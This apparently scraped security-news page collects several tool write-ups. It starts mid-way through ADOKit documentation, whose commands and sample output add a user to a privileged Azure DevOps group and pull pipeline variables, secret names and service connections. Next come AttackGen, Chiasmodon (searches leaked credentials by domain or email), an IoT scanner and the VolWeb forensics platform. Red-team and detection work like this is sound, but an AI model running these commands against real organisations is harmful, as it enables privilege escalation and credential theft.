Provide the addcollectionsvc module along with a /user: for a given user to be added to the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 11:21:01 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

4/5/23 15:21:04 Finished execution of addcollectionsvc

Remove Collection Service Account

Use Case

Remove a user from the Project Collection Service Accounts group.

Syntax

Provide the removecollectionsvc module along with a /user: for a given user to be removed from the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 11:21:43 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith

4/5/23 15:21:44 Finished execution of removecollectionsvc

Get Pipeline Variables

Use Case

Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.

Syntax

Provide the getpipelinevars module along with a /project: for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all in the /project: argument.

ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/6/2023 12:08:35 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Pipeline Var Name | Pipeline Var Value
-----------------------------------------------------------------------------------
credential | P@ssw0rd123!
url | http://blah/

4/6/23 16:08:36 Finished execution of getpipelinevars

Get Pipeline Secrets

Use Case

Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.

Syntax

Provide the getpipelinesecrets module along with a /project: for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all in the /project: argument.

ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/10/2023 10:28:37 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Build Secret Name | Build Secret Value
-----------------------------------------------------
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]

4/10/23 14:28:38 Finished execution of getpipelinesecrets

Get Service Connections

Use Case

List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.

Syntax

Provide the getserviceconnections module along with a /project: for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all in the /project: argument.

ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/11/2023 8:34:16 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Connection Name | Connection Type | ID
--------------------------------------------------------------------------------------------------------------------------------------------------
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

4/11/23 12:34:16 Finished execution of getserviceconnections

Detection

Below are static signatures for the specific usage of this tool in its default state:

  • Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
  • See ADOKit Yara Rule in this repo.
  • User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
  • See ADOKit Snort Rule in this repo.
  • Microsoft Sentinel Rules
  • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
  • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.

Roadmap

  • Support for Azure DevOps Server

References

  • https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
  • https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops


Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework

By: Zion3R


AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


Star the Repo

If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! โญ

Features

  • Generates unique incident response scenarios based on chosen threat actor groups.
  • Allows you to specify your organisation's size and industry for a tailored scenario.
  • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
  • Create custom scenarios based on a selection of ATT&CK techniques.
  • Capture user feedback on the quality of the generated scenarios.
  • Downloadable scenarios in Markdown format.
  • ๐Ÿ†• Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
  • Available as a Docker container image for easy deployment.
  • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


Releases

v0.4 (current)

What's new? Why is it useful?
Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

v0.3

What's new? Why is it useful?
Azure OpenAI Service Integration - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.

- Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
LangSmith for Azure OpenAI Service - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.

- User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

v0.2

What's new? Why is it useful?
Custom Scenarios based on ATT&CK Techniques - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.

- Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
User feedback on generated scenarios - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
Improved error handling for missing API keys - Improved user experience.
Replaced Streamlit st.spinner widgets with new st.status widget - Provides better visibility into long running processes (i.e. scenario generation).

v0.1

Initial release.

Requirements

  • Recent version of Python.
  • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
  • OpenAI API key.
  • LangChain API key (optional) - see LangSmith Setup section below for further details.
  • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

Installation

Option 1: Cloning the Repository

  1. Clone this repository:
git clone https://github.com/mrwadams/attackgen.git
  1. Change directory into the cloned repository:
cd attackgen
  1. Install the required Python packages:
pip install -r requirements.txt

Option 2: Using Docker

  1. Pull the Docker container image from Docker Hub:
docker pull mrwadams/attackgen

LangSmith Setup

If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.

Data Setup

Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/ directory within the repository.

Running AttackGen

After the data setup, you can run AttackGen with the following command:

streamlit run ๐Ÿ‘‹_Welcome.py

You can also try the app on Streamlit Community Cloud.

Usage

Running AttackGen

Option 1: Running the Streamlit App Locally

  1. Run the Streamlit app:
streamlit run ๐Ÿ‘‹_Welcome.py
  1. Open your web browser and navigate to the URL provided by Streamlit.
  2. Use the app to generate standard or custom incident response scenarios (see below for details).

Option 2: Using the Docker Container Image

  1. Run the Docker container:
docker run -p 8501:8501 mrwadams/attackgen

This command will start the container and map port 8501 (default for Streamlit apps) from the container to your host machine. 2. Open your web browser and navigate to http://localhost:8501. 3. Use the app to generate standard or custom incident response scenarios (see below for details).

Generating Scenarios

Standard Scenario Generation

  1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
  2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
  3. Select your organisatin's industry and size from the dropdown menus.
  4. Navigate to the Threat Group Scenarios page.
  5. Select the Threat Actor Group that you want to simulate.
  6. Click on 'Generate Scenario' to create the incident response scenario.
  7. Use the ๐Ÿ‘ or ๐Ÿ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

Custom Scenario Generation

  1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
  2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
  3. Select your organisation's industry and size from the dropdown menus.
  4. Navigate to the Custom Scenario page.
  5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
  6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
  7. Use the ๐Ÿ‘ or ๐Ÿ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

Contributing

I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

Licence

This project is licensed under GNU GPLv3.



Chiasmodon - An OSINT Tool Designed To Assist In The Process Of Gathering Information About A Target Domain

By: Zion3R


Chiasmodon is an OSINT (Open Source Intelligence) tool designed to assist in the process of gathering information about a target domain. Its primary functionality revolves around searching for domain-related data, including domain emails, domain credentials (usernames and passwords), CIDRs (Classless Inter-Domain Routing), ASNs (Autonomous System Numbers), and subdomains. the tool allows users to search by domain, CIDR, ASN, email, username, password, or Google Play application ID.


โœจFeatures

  • [x] ๐ŸŒDomain: Conduct targeted searches by specifying a domain name to gather relevant information related to the domain.
  • [x] ๐ŸŽฎGoogle Play Application: Search for information related to a specific application on the Google Play Store by providing the application ID.
  • [x] ๐Ÿ”ŽCIDR and ๐Ÿ”ขASN: Explore CIDR blocks and Autonomous System Numbers (ASNs) associated with the target domain to gain insights into network infrastructure and potential vulnerabilities.
  • [x] โœ‰๏ธEmail, ๐Ÿ‘คUsername, ๐Ÿ”’Password: Conduct searches based on email, username, or password to identify potential security risks or compromised credentials.
  • [x] ๐Ÿ“‹Output Customization: Choose the desired output format (text, JSON, or CSV) and specify the filename to save the search results.
  • [x] โš™๏ธAdditional Options: The tool offers various additional options, such as viewing different result types (credentials, URLs, subdomains, emails, passwords, usernames, or applications), setting API tokens, specifying timeouts, limiting results, and more.

๐Ÿš€Comming soon

  • ๐Ÿ“ฑPhone: Get ready to uncover even more valuable data by searching for information associated with phone numbers. Whether you're investigating a particular individual or looking for connections between phone numbers and other entities, this new feature will provide you with valuable insights.

  • ๐ŸขCompany Name: We understand the importance of comprehensive company research. In our upcoming release, you'll be able to search by company name and access a wide range of documents associated with that company. This feature will provide you with a convenient and efficient way to gather crucial information, such as legal documents, financial reports, and other relevant records.

  • ๐Ÿ‘คFace (Photo): Visual data is a powerful tool, and we are excited to introduce our advanced facial recognition feature. With "Search by Face (Photo)," you can upload an image containing a face and leverage cutting-edge technology to identify and match individuals across various data sources. This will allow you to gather valuable information, such as social media profiles, online presence, and potential connections, all through the power of facial recognition.

Why Chiasmodon name ?

Chiasmodon niger is a species of deep sea fish in the family Chiasmodontidae. It is known for its ability to swallow fish larger than itself. and so do we. ๐Ÿ˜‰ย 


๐Ÿ”‘ Subscription

Join us today and unlock the potential of our cutting-edge OSINT tool. Contact https://t.me/Chiasmod0n on Telegram to subscribe and start harnessing the power of Chiasmodon for your domain investigations.

โฌ‡๏ธInstall

pip install chiasmodon

๐Ÿ’ปUsage

Chiasmodon provides a flexible and user-friendly command-line interface and python library. Here are some examples to demonstrate its usage:

How to use pychiasmodon library:

from pychiasmodon import Chiasmodon as ch 
token = "PUT_HERE_YOUR_API_KEY"
obj = ch(token)
  • Searching for a target domain and its subdomains:

    • Command line bash chiasmodon_cli.py --domain example.com --all
    • Python ```python result = obj.search('example.com',method='domain', all=True)

      for i in result: print(i) ```

  • Searching for a target domain, you will see the result for only this "example.com":

    • Command line bash chiasmodon_cli.py --domain example.com
    • Python ```python result = obj.search('example.com',method='domain')

      for i in result: print(i) ```

  • Searching for a target application ID on the Google Play Store:

    • Command line bash chiasmodon_cli.py --app com.discord
    • Python ```python result = obj.search('com.discord',method='app')

      for i in result: print(i) ```

  • Searching for a target ASN:

    • Command line bash chiasmodon_cli.py --asn AS123 --view-type cred
    • Python ```python result = obj.search('AS123',method='asn', view_type='cred')

      for i in result: print(i) ```

  • earching for a target username:

    • Command line bash chiasmodon_cli.py --username someone
    • Python ```python result = obj.search('someone',method='username')

      for i in result: print(i) ```

  • Searching for a target password:

    • Command line bash chiasmodon_cli.py --password example@123
    • Python ```python result = obj.search('example@123',method='password')

      for i in result: print(i) ```

  • Searching for a target CIDR:

    • Command line bash chiasmodon_cli.py --cidr x.x.x.x/24
    • Python ```python result = obj.search('x.x.x.x/24',method='cidr')

      for i in result: print(i) ```

  • Searching for target credentials by domain emails:

    • Command line bash chiasmodon_cli.py --domain example.com --domain-emails
    • Python ```python result = obj.search('example.com',method='domain', only_domain_emails=True)

      for i in result: print(i) ``` - All methods and view types:

    Methods View Type
    --domain, --email, --cidr, --app, --asn, --username, --password --view-type cred
    --cidr, --asn, --email, --username, --password --view-type app
    --domain, --email, --cidr, --asn, --username, --password --view-type url
    --domain --view-type subdomain
    --domain, --cidr, --asn, --app --view-type email
    --domain, --cidr, --app, --asn, --email, --password --view-type username
    --domain, --cidr, --app, --asn, --email, --username --view-type password

Please note that these examples represent only a fraction of the available options and use cases. Refer to the documentation for more detailed instructions and explore the full range of features provided by Chiasmodon.

๐Ÿ’ฌ Contributions and Feedback

Contributions and feedback are welcome! If you encounter any issues or have suggestions for improvements, please submit them to the Chiasmodon GitHub repository. Your input will help us enhance the tool and make it more effective for the OSINT community.

๐Ÿ“œLicense

Chiasmodon is released under the MIT License. See the LICENSE file for more details.

โš ๏ธDisclaimer

Chiasmodon is intended for legal and authorized use only. Users are responsible for ensuring compliance with applicable laws and regulations when using the tool. The developers of Chiasmodon disclaim any responsibility for the misuse or illegal use of the tool.

๐Ÿ“ขAcknowledgments

Chiasmodon is the result of collaborative efforts from a dedicated team of contributors who believe in the power of OSINT. We would like to express our gratitude to the open-source community for their valuable contributions and support.



ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols utilized By IoT Devices

By: Zion3R


ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.


~ Hilali Abdel

USAGE

python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

[Add new Device]

python3 smartthings.py -a 192.168.1.1

python3 smarthings.py -s --type TPLINK

python3 smartthings.py -s --firmware TP-Link Archer C7v2

Search for CVE and Poc [ firmware and device type]

ย 

Scan device for open upnp ports

python3 smartthings.py -s --scan upnp --id

get data from mqtt 'subscribe'

python3 smartthings.py -s --scan mqtt --id



VolWeb - A Centralized And Enhanced Memory Analysis Platform

By: Zion3R


VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.


Objective

The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.

By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.

Project Documentation and Getting Started Guide

The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.

[!IMPORTANT] Take time to read the documentation in order to avoid common miss-configuration issues.

Interacting with the REST API

VolWeb exposes a REST API to allow analysts to interact with the platform. There is a dedicated repository proposing some scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts Check the wiki of the project to learn more about the possible API calls.

Issues

If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.

Contact

Contact me at k1nd0ne@mail.com for any questions regarding this tool.

Next Release Goals

Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1



โŒ